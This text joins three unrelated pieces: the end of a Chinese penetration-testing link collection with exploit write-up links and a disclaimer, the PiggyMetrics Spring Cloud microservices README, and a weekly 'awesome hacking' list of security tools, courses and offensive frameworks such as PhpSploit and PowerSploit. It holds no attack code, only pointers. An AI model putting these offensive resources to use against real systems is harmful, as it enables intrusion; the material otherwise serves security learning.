- [利用ASP.NET Web API Help Page文件上传](https://xz.aliyun.com/t/11697)|[备份](https://archive.ph/iHhCI)|[备份2](https://web.archive.org/web/20220916035046/https://xz.aliyun.com/t/11697)
- [使用Sqlmap的你可能踩中了“蜜罐”](https://mp.weixin.qq.com/s/hwLNz-00YCBvBWMzJZM2Bg)|[备份](https://archive.ph/TL3wY)|[备份1](https://web.archive.org/web/20220918114117/https://mp.weixin.qq.com/s/hwLNz-00YCBvBWMzJZM2Bg)
- [fastjson 1.2.80 漏洞分析](https://xz.aliyun.com/t/11727)|[备份](https://archive.ph/BuDzZ)|[备份二](http://web.archive.org/web/20220927064359/https://xz.aliyun.com/t/11727)
- [ECShop 0day 的堕落之路-2.x加3.x的SQL注入和代码执行](https://paper.seebug.org/695/)|[备份一](https://archive.ph/wip/cfuYx)|[备份二](https://web.archive.org/web/20221024132558/https://paper.seebug.org/695/)
- [AD-Pentest-Notes:内网渗透(域渗透)学习记录](https://github.com/chriskaliX/AD-Pentest-Notes)
- [MySql安全总结](https://xz.aliyun.com/t/11910)|[备份](https://archive.ph/jhpNs)|[备份2](https://web.archive.org/web/20220000000000*/https://xz.aliyun.com/t/11910)
- [SecurityList: 有关代码审计和web安全的仓库](https://github.com/ax1sX/SecurityList)
- [通达oa11.9前台getshell漏洞分析](https://forum.butian.net/share/2049)|[备份](https://web.archive.org/web/20221214141510/https://forum.butian.net/share/2049)
- [冰心网络验证V3.1-代码审计到getshell](https://forum.butian.net/index.php/share/1206)|[备份](https://web.archive.org/web/20221226034923/https://forum.butian.net/index.php/share/1206)|[备份](https://archive.ph/uxK4i)
- [【两万字原创长文】完全零基础入门Fastjson系列漏洞(基础篇)](https://mp.weixin.qq.com/s/SOKLC_No0hV9RhAavF2hcw)
- [hack-fastjson-1.2.80: Kcon Hacking JSON 议题相关内容](https://github.com/su18/hack-fastjson-1.2.80)
- [Fastjson不出网利用总结【很详细的说明总结】](https://xz.aliyun.com/t/12492)|[备份](http://web.archive.org/web/20230427142548/https://xz.aliyun.com/t/12492)
- [wechat: 微信收藏的文章【渗透、技巧相关文章】](https://github.com/izj007/wechat)
- [sec-books-part1: 网安类绝版图书](https://github.com/apachecn/sec-books-part1)
- [dotnet-deserialization: dotnet 反序列化学习笔记](https://github.com/Y4er/dotnet-deserialization)
## <span id="head9"> 说明</span>
### 免责声明
> 1.此项目所有文章、代码部分来源于互联网,版权归原作者所有,转载留存的都会写上原著出处,如有遗漏,还请说明,谢谢!
> 2.此项目仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任!
> 3.如果项目中涉及到你的隐私或者需要删除的,请issue留言指名具体文件内容,附上你的证明,或者邮箱联系我,核实后即刻删除。
<details>
<summary>其他杂项</summary>
在`2020-08-16`登上`GitHub`的`Trending`日榜,谢谢大家支持,谢谢那些在freebuf和公众号推荐的师傅,我会继续努力,期待有靠谱的师傅一起来维护优化,感兴趣的邮箱联系我吧!
![trending](./img/trending.png)
</details>
## Stargazers over time
[![Stargazers over time](https://starchart.cc/Mr-xn/Penetration_Testing_POC.svg)](https://starchart.cc/Mr-xn/Penetration_Testing_POC)
### 最后,选一个屁股吧!
![](https://ooo.0o0.ooo/2017/06/13/593fb9335fe9c.jpg)
|
[![Build Status](https://travis-ci.org/sqshq/PiggyMetrics.svg?branch=master)](https://travis-ci.org/sqshq/PiggyMetrics)
[![codecov.io](https://codecov.io/github/sqshq/PiggyMetrics/coverage.svg?branch=master)](https://codecov.io/github/sqshq/PiggyMetrics?branch=master)
[![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/sqshq/PiggyMetrics/blob/master/LICENCE)
[![Join the chat at https://gitter.im/sqshq/PiggyMetrics](https://badges.gitter.im/sqshq/PiggyMetrics.svg)](https://gitter.im/sqshq/PiggyMetrics?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
# Piggy Metrics
**A simple way to deal with personal finances**
This is a [proof-of-concept application](http://my-piggymetrics.rhcloud.com), which demonstrates [Microservice Architecture Pattern](http://martinfowler.com/microservices/) using Spring Boot, Spring Cloud and Docker.
With a pretty neat user interface, by the way.
![](https://cloud.githubusercontent.com/assets/6069066/13864234/442d6faa-ecb9-11e5-9929-34a9539acde0.png)
![Piggy Metrics](https://cloud.githubusercontent.com/assets/6069066/13830155/572e7552-ebe4-11e5-918f-637a49dff9a2.gif)
## Functional services
PiggyMetrics was decomposed into three core microservices. All of them are independently deployable applications, organized around certain business capability.
<img width="880" alt="Functional services" src="https://cloud.githubusercontent.com/assets/6069066/13900465/730f2922-ee20-11e5-8df0-e7b51c668847.png">
#### Account service
Contains general user input logic and validation: incomes/expenses items, savings and account settings.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /accounts/{account} | Get specified account data | |
GET | /accounts/current | Get current account data | × | ×
GET | /accounts/demo | Get demo account data (pre-filled incomes/expenses items, etc) | | ×
PUT | /accounts/current | Save current account data | × | ×
POST | /accounts/ | Register new account | | ×
#### Statistics service
Performs calculations on major statistics parameters and captures time series for each account. Datapoint contains values, normalized to base currency and time period. This data is used to track cash flow dynamics in account lifetime (fancy charts not yet implemented in UI).
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /statistics/{account} | Get specified account statistics | |
GET | /statistics/current | Get current account statistics | × | ×
GET | /statistics/demo | Get demo account statistics | | ×
PUT | /statistics/{account} | Create or update time series datapoint for specified account | |
#### Notification service
Stores users contact information and notification settings (like remind and backup frequency). Scheduled worker collects required information from other services and sends e-mail messages to subscribed customers.
Method | Path | Description | User authenticated | Available from UI
------------- | ------------------------- | ------------- |:-------------:|:----------------:|
GET | /notifications/settings/current | Get current account notification settings | × | ×
PUT | /notifications/settings/current | Save current account notification settings | × | ×
#### Notes
- Each microservice has it's own database, so there is no way to bypass API and access persistance data directly.
- In this project, I use MongoDB as a primary database for each service. It might also make sense to have a polyglot persistence architecture (сhoose the type of db that is best suited to service requirements).
- Service-to-service communication is quite simplified: microservices talking using only synchronous REST API. Common practice in a real-world systems is to use combination of interaction styles. For example, perform synchronous GET request to retrieve data and use asynchronous approach via Message broker for create/update operations in order to decouple services and buffer messages. However, this brings us in [eventual consistency](http://martinfowler.com/articles/microservice-trade-offs.html#consistency) world.
## Infrastructure services
There's a bunch of common patterns in distributed systems, which could help us to make described core services work. [Spring cloud](http://projects.spring.io/spring-cloud/) provides powerful tools that enhance Spring Boot applications behaviour to implement those patterns. I'll cover them briefly.
<img width="880" alt="Infrastructure services" src="https://cloud.githubusercontent.com/assets/6069066/13906840/365c0d94-eefa-11e5-90ad-9d74804ca412.png">
### Config service
[Spring Cloud Config](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html) is horizontally scalable centralized configuration service for distributed systems. It uses a pluggable repository layer that currently supports local storage, Git, and Subversion.
In this project, I use `native profile`, which simply loads config files from the local classpath. You can see `shared` directory in [Config service resources](https://github.com/sqshq/PiggyMetrics/tree/master/config/src/main/resources). Now, when Notification-service requests it's configuration, Config service responses with `shared/notification-service.yml` and `shared/application.yml` (which is shared between all client applications).
##### Client side usage
Just build Spring Boot application with `spring-cloud-starter-config` dependency, autoconfiguration will do the rest.
Now you don't need any embedded properties in your application. Just provide `bootstrap.yml` with application name and Config service url:
```yml
spring:
application:
name: notification-service
cloud:
config:
uri: http://config:8888
fail-fast: true
```
##### With Spring Cloud Config, you can change app configuration dynamically.
For example, [EmailService bean](https://github.com/sqshq/PiggyMetrics/blob/master/notification-service/src/main/java/com/piggymetrics/notification/service/EmailServiceImpl.java) was annotated with `@RefreshScope`. That means, you can change e-mail text and subject without rebuild and restart Notification service application.
First, change required properties in Config server. Then, perform refresh request to Notification service:
`curl -H "Authorization: Bearer #token#" -XPOST http://127.0.0.1:8000/notifications/refresh`
Also, you could use Repository [webhooks to automate this process](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_push_notifications_and_spring_cloud_bus)
##### Notes
- There are some limitations for dynamic refresh though. `@RefreshScope` doesn't work with `@Configuration` classes and doesn't affect `@Scheduled` methods
- `fail-fast` property means that Spring Boot application will fail startup immediately, if it cannot connect to the Config Service. That's very useful when start [all applications together](https://github.com/sqshq/PiggyMetrics#how-to-run-all-the-things)
- There are significant [security notes](https://github.com/sqshq/PiggyMetrics#security) below
### Auth service
Authorization responsibilities are completely extracted to separate server, which grants [OAuth2 tokens](https://tools.ietf.org/html/rfc6749) for the backend resource services. Auth Server is used for user authorization as well as for secure machine-to-machine communication inside a perimeter.
In this project, I use [`Password credentials`](https://tools.ietf.org/html/rfc6749#section-4.3) grant type for users authorization (since it's used only by native PiggyMetrics UI) and [`Client Credentials`](https://tools.ietf.org/html/rfc6749#section-4.4) grant for microservices authorization.
Spring Cloud Security provides convenient annotations and autoconfiguration to make this really easy to implement from both server and client side. You can learn more about it in [documentation](http://cloud.spring.io/spring-cloud-security/spring-cloud-security.html) and check configuration details in [Auth Server code](https://github.com/sqshq/PiggyMetrics/tree/master/auth-service/src/main/java/com/piggymetrics/auth).
From the client side, everything works exactly the same as with traditional session-based authorization. You can retrieve `Principal` object from request, check user's roles and other stuff with expression-based access control and `@PreAuthorize` annotation.
Each client in PiggyMetrics (account-service, statistics-service, notification-service and browser) has a scope: `server` for backend services, and `ui` - for the browser. So we can also protect controllers from external access, for example:
``` java
@PreAuthorize("#oauth2.hasScope('server')")
@RequestMapping(value = "accounts/{name}", method = RequestMethod.GET)
public List<DataPoint> getStatisticsByAccountName(@PathVariable String name) {
return statisticsService.findByAccountName(name);
}
```
### API Gateway
As you can see, there are three core services, which expose external API to client. In a real-world systems, this number can grow very quickly as well as whole system complexity. Actualy, hundreds of services might be involved in rendering one complex webpage.
In theory, a client could make requests to each of the microservices directly. But obviously, there are challenges and limitations with this option, like necessity to know all endpoints addresses, perform http request for each peace of information separately, merge the result on a client side. Another problem is non web-friendly protocols, which might be used on the backend.
Usually a much better approach is to use API Gateway. It is a single entry point into the system, used to handle requests by routing them to the appropriate backend service or by invoking multiple backend services and [aggregating the results](http://techblog.netflix.com/2013/01/optimizing-netflix-api.html). Also, it can be used for authentication, insights, stress and canary testing, service migration, static response handling, active traffic management.
Netflix opensourced [such an edge service](http://techblog.netflix.com/2013/06/announcing-zuul-edge-service-in-cloud.html), and now with Spring Cloud we can enable it with one `@EnableZuulProxy` annotation. In this project, I use Zuul to store static content (ui application) and to route requests to appropriate microservices. Here's a simple prefix-based routing configuration for Notification service:
```yml
zuul:
routes:
notification-service:
path: /notifications/**
serviceId: notification-service
stripPrefix: false
```
That means all requests starting with `/notifications` will be routed to Notification service. There is no hardcoded address, as you can see. Zuul uses [Service discovery](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#service-discovery) mechanism to locate Notification service instances and also [Circuit Breaker and Load Balancer](https://github.com/sqshq/PiggyMetrics/blob/master/README.md#http-client-load-balancer-and-circuit-breaker), described below.
### Service discovery
Another commonly known architecture pattern is Service discovery. It allows automatic detection of network locations for service instances, which could have dynamically assigned addresses because of auto-scaling, failures and upgrades.
The key part of Service discovery is Registry. I use Netflix Eureka in this project. Eureka is a good example of the client-side discovery pattern, when client is responsible for determining locations of available service instances (using Registry server) and load balancing requests across them.
With Spring Boot, you can easily build Eureka Registry with `spring-cloud-starter-eureka-server` dependency, `@EnableEurekaServer` annotation and simple configuration properties.
Client support enabled with `@EnableDiscoveryClient` annotation an `bootstrap.yml` with application name:
``` yml
spring:
application:
name: notification-service
```
Now, on application startup, it will register with Eureka Server and provide meta-data, such as host and port, health indicator URL, home page etc. Eureka receives heartbeat messages from each instance belonging to a service. If the heartbeat fails over a configurable timetable, the instance will be removed from the registry.
Also, Eureka provides a simple interface, where you can track running services and number of available instances: `http://localhost:8761`
### Load balancer, Circuit breaker and Http client
Netflix OSS provides another great set of tools.
#### Ribbon
Ribbon is a client side load balancer which gives you a lot of control over the behaviour of HTTP and TCP clients. Compared to a traditional load balancer, there is no need in additional hop for every over-the-wire invocation - you can contact desired service directly.
Out of the box, it natively integrates with Spring Cloud and Service Discovery. [Eureka Client](https://github.com/sqshq/PiggyMetrics#service-discovery) provides a dynamic list of available servers so Ribbon could balance between them.
#### Hystrix
Hystrix is the implementation of [Circuit Breaker pattern](http://martinfowler.com/bliki/CircuitBreaker.html), which gives a control over latency and failure from dependencies accessed over the network. The main idea is to stop cascading failures in a distributed environment with a large number of microservices. That helps to fail fast and recover as soon as possible - important aspects of fault-tolerant systems that self-heal.
Besides circuit breaker control, with Hystrix you can add a fallback method that will be called to obtain a default value in case the main command fails.
Moreover, Hystrix generates metrics on execution outcomes and latency for each command, that we can use to [monitor system behavior](https://github.com/sqshq/PiggyMetrics#monitor-dashboard).
#### Feign
Feign is a declarative Http client, which seamlessly integrates with Ribbon and Hystrix. Actually, with one `spring-cloud-starter-feign` dependency and `@EnableFeignClients` annotation you have a full set of Load balancer, Circuit breaker and Http client with sensible ready-to-go default configuration.
Here is an example from Account Service:
``` java
@FeignClient(name = "statistics-service")
public interface StatisticsServiceClient {
@RequestMapping(method = RequestMethod.PUT, value = "/statistics/{accountName}", consumes = MediaType.APPLICATION_JSON_UTF8_VALUE)
void updateStatistics(@PathVariable("accountName") String accountName, Account account);
}
```
- Everything you need is just an interface
- You can share `@RequestMapping` part between Spring MVC controller and Feign methods
- Above example specifies just desired service id - `statistics-service`, thanks to autodiscovery through Eureka (but obviously you can access any resource with a specific url)
### Monitor dashboard
In this project configuration, each microservice with Hystrix on board pushes metrics to Turbine via Spring Cloud Bus (with AMQP broker). The Monitoring project is just a small Spring boot application with [Turbine](https://github.com/Netflix/Turbine) and [Hystrix Dashboard](https://github.com/Netflix/Hystrix/tree/master/hystrix-dashboard).
See below [how to get it up and running](https://github.com/sqshq/PiggyMetrics#how-to-run-all-the-things).
Let's see our system behavior under load: Account service calls Statistics service and it responses with a vary imitation delay. Response timeout threshold is set to 1 second.
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14194375/d9a2dd80-f7be-11e5-8bcc-9a2fce753cfe.png">
<img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127349/21e90026-f628-11e5-83f1-60108cb33490.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127348/21e6ed40-f628-11e5-9fa4-ed527bf35129.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127346/21b9aaa6-f628-11e5-9bba-aaccab60fd69.gif"> | <img width="212" src="https://cloud.githubusercontent.com/assets/6069066/14127350/21eafe1c-f628-11e5-8ccd-a6b6873c046a.gif">
--- |--- |--- |--- |
| `0 ms delay` | `500 ms delay` | `800 ms delay` | `1100 ms delay`
| Well behaving system. The throughput is about 22 requests/second. Small number of active threads in Statistics service. The median service time is about 50 ms. | The number of active threads is growing. We can see purple number of thread-pool rejections and therefore about 30-40% of errors, but circuit is still closed. | Half-open state: the ratio of failed commands is more than 50%, the circuit breaker kicks in. After sleep window amount of time, the next request is let through. | 100 percent of the requests fail. The circuit is now permanently open. Retry after sleep time won't close circuit again, because the single request is too slow.
### Log analysis
Centralized logging can be very useful when attempting to identify problems in a distributed environment. Elasticsearch, Logstash and Kibana stack lets you search and analyze your logs, utilization and network activity data with ease.
Ready-to-go Docker configuration described [in my other project](http://github.com/sqshq/ELK-docker).
## Security
An advanced security configuration is beyond the scope of this proof-of-concept project. For a more realistic simulation of a real system, consider to use https, JCE keystore to encrypt Microservices passwords and Config server properties content (see [documentation](http://cloud.spring.io/spring-cloud-config/spring-cloud-config.html#_security) for details).
## Infrastructure automation
Deploying microservices, with their interdependence, is much more complex process than deploying monolithic application. It is important to have fully automated infrastructure. We can achieve following benefits with Continuous Delivery approach:
- The ability to release software anytime
- Any build could end up being a release
- Build artifacts once - deploy as needed
Here is a simple Continuous Delivery workflow, implemented in this project:
<img width="880" src="https://cloud.githubusercontent.com/assets/6069066/14159789/0dd7a7ce-f6e9-11e5-9fbb-a7fe0f4431e3.png">
In this [configuration](https://github.com/sqshq/PiggyMetrics/blob/master/.travis.yml), Travis CI builds tagged images for each successful git push. So, there are always `latest` image for each microservice on [Docker Hub](https://hub.docker.com/r/sqshq/) and older images, tagged with git commit hash. It's easy to deploy any of them and quickly rollback, if needed.
## How to run all the things?
Keep in mind, that you are going to start 8 Spring Boot applications, 4 MongoDB instances and RabbitMq. Make sure you have `4 Gb` RAM available on your machine. You can always run just vital services though: Gateway, Registry, Config, Auth Service and Account Service.
#### Before you start
- Install Docker and Docker Compose.
- Export environment variables: `CONFIG_SERVICE_PASSWORD`, `NOTIFICATION_SERVICE_PASSWORD`, `STATISTICS_SERVICE_PASSWORD`, `ACCOUNT_SERVICE_PASSWORD`, `MONGODB_PASSWORD`
#### Production mode
In this mode, all latest images will be pulled from Docker Hub. Just copy `docker-compose.yml` and hit `docker-compose up -d`.
#### Development mode
If you'd like to build images yourself (with some changes in the code, for example), you have to clone all repository and build artifacts with maven. Then, run `docker-compose -f docker-compose.yml -f docker-compose.dev.yml up -d`
`docker-compose.dev.yml` inherits `docker-compose.yml` with additional possibility to build images locally and expose all containers ports for convenient development.
#### Important endpoints
- http://DOCKER-HOST:80 - Gateway
- http://DOCKER-HOST:8761 - Eureka Dashboard
- http://DOCKER-HOST:9000/hystrix - Hystrix Dashboard
- http://DOCKER-HOST:8989 - Turbine stream (source for the Hystrix Dashboard)
- http://DOCKER-HOST:15672 - RabbitMq management (default login/password: guest/guest)
#### Notes
All Spring Boot applications require already running [Config Server](https://github.com/sqshq/PiggyMetrics#config-service) for startup. But we can start all containers simultaneously because of `fail-fast` Spring Boot property and `restart: always` docker-compose option. That means all dependent containers will try to restart until Config Server will be up and running.
Also, Service Discovery mechanism needs some time after all applications startup. Any service is not available for discovery by clients until the instance, the Eureka server and the client all have the same metadata in their local cache, so it could take 3 heartbeats. Default heartbeat period is 30 seconds.
## Feedback welcome
PiggyMetrics is open source, and would greatly appreciate your help. Feel free to contact me with any questions.
|
# Track Awesome Hacking Updates Weekly
A curated list of awesome Hacking tutorials, tools and resources
[🏠 Home](/README.md) · [🔍 Search](https://www.trackawesomelist.com/search/) · [🔥 Feed](https://www.trackawesomelist.com/carpedm20/awesome-hacking/week/rss.xml) · [📮 Subscribe](https://trackawesomelist.us17.list-manage.com/subscribe?u=d2f0117aa829c83a63ec63c2f&id=36a103854c) · [❤️ Sponsor](https://github.com/sponsors/theowenyoung) · [😺 carpedm20/awesome-hacking](https://github.com/carpedm20/awesome-hacking) · ⭐ 10K · 🏷️ Security
[ [Daily](/content/carpedm20/awesome-hacking/README.md) / Weekly / [Overview](/content/carpedm20/awesome-hacking/readme/README.md) ]
## [Jul 03 - Jul 09, 2023](/content/2023/27/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull kalilinux/kali-linux-docker` [official Kali Linux](https://hub.docker.com/r/kalilinux/kali-last-release/)
### Tools / Other
* [Shodan](https://www.shodan.io/) - A web-crawling search engine that lets users search for various types of servers connected to the internet.
* [masscan (⭐21k)](https://github.com/robertdavidgraham/masscan) - Internet scale portscanner.
* [Keyscope (⭐371)](https://github.com/SpectralOps/keyscope) - an extensible key and secret validation tool for auditing active secrets against multiple SaaS vendors
* [CyLR (⭐546)](https://github.com/orlikoski/CyLR) - NTFS forensic image collector
* [CAINE](https://www.caine-live.net/)- CAINE is a Ubuntu-based app that offers a complete forensic environment that provides a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.
## [Feb 28 - Mar 06, 2022](/content/2022/9/README.md)
### Online resources / Other
* [Security related Operating Systems @ Rawsec](https://inventory.raw.pm/operating_systems.html) - Complete list of security related operating systems
### tools / Other
* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/) - An open-source inventory of tools, resources, CTF platforms and Operating Systems about CyberSecurity. ([Source](https://gitlab.com/rawsec/rawsec-cybersecurity-list))
## [Oct 18 - Oct 24, 2021](/content/2021/42/README.md)
### Tools / Other
* [Decompiler.com](https://www.decompiler.com/) - Java, Android, Python, C# online decompiler.
## [Oct 04 - Oct 10, 2021](/content/2021/40/README.md)
### Web / Other
* [TryHackMe](https://tryhackme.com/) - Hands-on cyber security training through real-world scenarios.
## [Sep 13 - Sep 19, 2021](/content/2021/37/README.md)
### Tutorials
* [Roppers Computing Fundamentals](https://hoppersroppers.org/course.html)
* Free, self-paced curriculum that builds a base of knowledge in computers and networking. Intended to build up a student with no prior technical knowledge to be confident in their ability to learn anything and continue their security education. Full text available as a [gitbook](https://www.hoppersroppers.org/fundamentals/).
### General / Other
* [Roppers CTF Fundamentals Course](https://www.hoppersroppers.org/courseCTF.html) - Free course designed to get a student crushing CTFs as quickly as possible. Teaches the mentality and skills required for crypto, forensics, and more. Full text available as a [gitbook](https://www.hoppersroppers.org/ctf/).
### tools / Other
* [Roppers Security Fundamentals](https://www.hoppersroppers.org/courseSecurity.html) - Free course that teaches a beginner how security works in the real world. Learn security theory and execute defensive measures so that you are better prepared against threats online and in the physical world. Full text available as a [gitbook](https://www.hoppersroppers.org/security/).
## [May 24 - May 30, 2021](/content/2021/21/README.md)
### Tools / Other
* [Netz (⭐360)](https://github.com/spectralops/netz) - Discover internet-wide misconfigurations, using zgrab2 and others.
## [Feb 15 - Feb 21, 2021](/content/2021/7/README.md)
### Tools / Other
* [CSP Scanner](https://cspscanner.com/) - Analyze a site's Content-Security-Policy (CSP) to find bypasses and missing directives.
* [RustScan (⭐10k)](https://github.com/rustscan/rustscan) - Extremely fast port scanner built with Rust, designed to scan all ports in a couple of seconds and utilizes nmap to perform port enumeration in a fraction of the time.
## [Nov 09 - Nov 15, 2020](/content/2020/45/README.md)
### Tutorials
* [Exploit Writing Tutorials for Pentesters](http://web.archive.org/web/20140916085343/http://www.punter-infosec.com/exploit-writing-tutorials-for-pentesters/)
* [Lena151: Reversing With Lena](https://archive.org/details/lena151)
### Docker Images for Penetration Testing & Security
* `docker pull metasploitframework/metasploit-framework
` - [Official Metasploit](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
* `docker pull noncetonic/archlinux-pentest-lxde` - [Arch Linux Penetration Tester](https://hub.docker.com/r/noncetonic/archlinux-pentest-lxde)
## [Oct 26 - Nov 01, 2020](/content/2020/43/README.md)
### Disassemblers and debuggers
* [Ghidra](https://ghidra-sre.org/) - A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
## [Oct 05 - Oct 11, 2020](/content/2020/40/README.md)
### Binary files examination and editing / Other
* [Kaitai Struct (⭐3.5k)](https://github.com/kaitai-io/kaitai_struct) - a DSL for creating parsers in a variety of programming languages. The Web IDE is particularly useful for reverse-engineering.
### Tools / Other
* [Git-Scanner (⭐294)](https://github.com/HightechSec/git-scanner) - A tool for bug hunting or pentesting for targeting websites that have open `.git` repositories available in public
### Competition / Other
* [prompt(1) to win](http://prompt.ml/) - XSS Challenges
## [Aug 31 - Sep 06, 2020](/content/2020/35/README.md)
### Tools / Other
* [PhpSploit (⭐2k)](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner
## [Aug 10 - Aug 16, 2020](/content/2020/32/README.md)
### Tools / Other
* [Ciphey (⭐14k)](https://github.com/ciphey/ciphey) - Automated decryption tool using artificial intelligence & natural language processing.
## [Aug 03 - Aug 09, 2020](/content/2020/31/README.md)
### Docker Images for Penetration Testing & Security
* `docker pull vulnerables/web-owasp-nodegoat` - [OWASP NodeGoat (⭐1.7k)](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker)
## [Jun 22 - Jun 28, 2020](/content/2020/25/README.md)
### Tutorials
* [Begin RE: A Reverse Engineering Tutorial Workshop](https://www.begin.re/the-workshop)
* [Malware Unicorn Reverse Engineering Tutorial](https://malwareunicorn.org/workshops/re101.html#0)
## [May 25 - May 31, 2020](/content/2020/21/README.md)
### Tutorials
* [Shells](https://www.youtube.com/playlist?list=PLyzOVJj3bHQuloKGG59rS43e29ro7I57J)
* [Missing Semester](https://missing.csail.mit.edu/2020/course-shell/)
### Tools
* [Hackers tools](https://www.youtube.com/playlist?list=PLyzOVJj3bHQuiujH1lpn8cA9dsyulbYRv) - Tutorial on tools.
## [Apr 13 - Apr 19, 2020](/content/2020/15/README.md)
### Tools / Other
* [Scapy (⭐127)](https://github.com/secdev/awesome-scapy) - A Python tool and library for low level packet creation and manipulation
## [Nov 18 - Nov 24, 2019](/content/2019/46/README.md)
### Tools / Other
* [Spyse](https://spyse.com/) - Data gathering service that collects web info using OSINT. Provided info: IPv4 hosts, domains/whois, ports/banners/protocols, technologies, OS, AS, maintains huge SSL/TLS DB, and more... All the data is stored in its own database allowing get the data without scanning.
* [Findsubdomains](https://findsubdomains.com/) - A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.
## [Oct 21 - Oct 27, 2019](/content/2019/42/README.md)
### Competition / Other
* [HackTheBox](https://www.hackthebox.eu/)
### tools / Other
* [ebowla (⭐707)](https://github.com/Genetic-Malware/Ebowla) - Framework for Making Environmental Keyed Payloads
## [Oct 14 - Oct 20, 2019](/content/2019/41/README.md)
### Tools / Other
* [IPED - Indexador e Processador de Evidências Digitais](https://servicos.dpf.gov.br/ferramentas/IPED/) - Brazilian Federal Police Tool for Forensic Investigation
### System / Other
* [HackingLab](https://www.hacking-lab.com/)
## [Oct 07 - Oct 13, 2019](/content/2019/40/README.md)
### Web / Other
* [fuzzy.land](https://fuzzy.land/) - Website by an Austrian group. Lots of challenges taken from CTFs they participated in.
## [Sep 09 - Sep 15, 2019](/content/2019/36/README.md)
### Tools / Other
* [findsubdomains](https://findsubdomains.com) - really fast subdomains scanning service that has much greater opportunities than simple subs finder(works using OSINT).
* [cirt-fuzzer](http://www.cirt.dk/) - A simple TCP/UDP protocol fuzzer.
* [ASlookup](https://aslookup.com/) - a useful tool for exploring autonomous systems and all related info (CIDR, ASN, Org...)
## [Aug 12 - Aug 18, 2019](/content/2019/32/README.md)
### tools / Other
* [PowerSploit (⭐11k)](https://github.com/PowerShellMafia/PowerSploit) - A PowerShell post exploitation framework
## [Jun 17 - Jun 23, 2019](/content/2019/24/README.md)
### Decompilers
* [JD-GUI (⭐13k)](https://github.com/java-decompiler/jd-gui)
* Python
* [uncompyle6 (⭐3.2k)](https://github.com/rocky/python-uncompyle6) - decompiler for the over 20 releases and 20 years of CPython.
### Binary files examination and editing / Hex editors
* [Synalize It](https://www.synalysis.net/)/[Hexinator](https://hexinator.com/) -
### Competition / Other
* [Pico CTF](https://picoctf.com/)
## [Mar 11 - Mar 17, 2019](/content/2019/10/README.md)
### General / Other
* [Strong node.js (⭐488)](https://github.com/jesusprubio/strong-node) - An exhaustive checklist to assist in the source code security analysis of a node.js web service.
## [Nov 12 - Nov 18, 2018](/content/2018/46/README.md)
### Tools / Other
* [badtouch (⭐358)](https://github.com/kpcyrd/badtouch) - Scriptable network authentication cracker
* [sniffglue (⭐956)](https://github.com/kpcyrd/sniffglue) - Secure multithreaded packet sniffer
## [Oct 29 - Nov 04, 2018](/content/2018/44/README.md)
### Bug bounty - Earn Some Money / Other
* [Bugcrowd](https://www.bugcrowd.com/)
* [Hackerone](https://www.hackerone.com/start-hacking)
## [Oct 15 - Oct 21, 2018](/content/2018/42/README.md)
### Disassemblers and debuggers
* [x64dbg (⭐41k)](https://github.com/x64dbg/x64dbg) - An open-source x64/x32 debugger for Windows
* [Capstone (⭐6.5k)](https://github.com/aquynh/capstone)
### Decompilers
* JVM-based languages
* [Krakatau (⭐1.8k)](https://github.com/Storyyeller/Krakatau) - the best decompiler I have used. Is able to decompile apps written in Scala and Kotlin into Java code. JD-GUI and Luyten have failed to do it fully.
* [procyon](https://bitbucket.org/mstrobel/procyon/wiki/Java%20Decompiler)
* [Luyten (⭐4.8k)](https://github.com/deathmarine/Luyten) - one of the best, though a bit slow, hangs on some binaries and not very well maintained.
* [JAD](http://varaneckas.com/jad/) - JAD Java Decompiler (closed-source, unmaintained)
* [JADX (⭐35k)](https://github.com/skylot/jadx) - a decompiler for Android apps. Not related to JAD.
* .net-based languages
* [dotPeek](https://www.jetbrains.com/decompiler/) - a free-of-charge .NET decompiler from JetBrains
* [ILSpy (⭐18k)](https://github.com/icsharpcode/ILSpy/) - an open-source .NET assembly browser and decompiler
* [dnSpy (⭐24k)](https://github.com/0xd4d/dnSpy) - .NET assembly editor, decompiler, and debugger
* native code
* [Hopper](https://www.hopperapp.com) - A OS X and Linux Disassembler/Decompiler for 32/64-bit Windows/Mac/Linux/iOS executables.
* [cutter](https://github.com/radareorg/cutter) - a decompiler based on radare2.
* [retdec (⭐7.4k)](https://github.com/avast-tl/retdec)
* [snowman (⭐2.3k)](https://github.com/yegord/snowman)
* [Hex-Rays](https://www.hex-rays.com/products/decompiler/)
### Deobfuscators
* [de4dot (⭐6.4k)](https://github.com/0xd4d/de4dot) - .NET deobfuscator and unpacker.
* [JS Beautifier (⭐8.2k)](https://github.com/beautify-web/js-beautify)
* [JS Nice](http://jsnice.org/) - a web service guessing JS variables names and types based on the model derived from open source.
### Other
* [nudge4j (⭐153)](https://github.com/lorenzoongithub/nudge4j) - Java tool to let the browser talk to the JVM
* [dex2jar (⭐11k)](https://github.com/pxb1988/dex2jar) - Tools to work with Android .dex and Java .class files
* [androguard](https://code.google.com/p/androguard/) - Reverse engineering, malware and goodware analysis of Android applications
* [antinet (⭐278)](https://github.com/0xd4d/antinet) - .NET anti-managed debugger and anti-profiler code
* [UPX](http://upx.sourceforge.net/) - the Ultimate Packer (and unpacker) for eXecutables
### Execution logging and tracing
* [Wireshark](https://www.wireshark.org/) - A free and open-source packet analyzer
* [tcpdump](http://www.tcpdump.org/) - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture
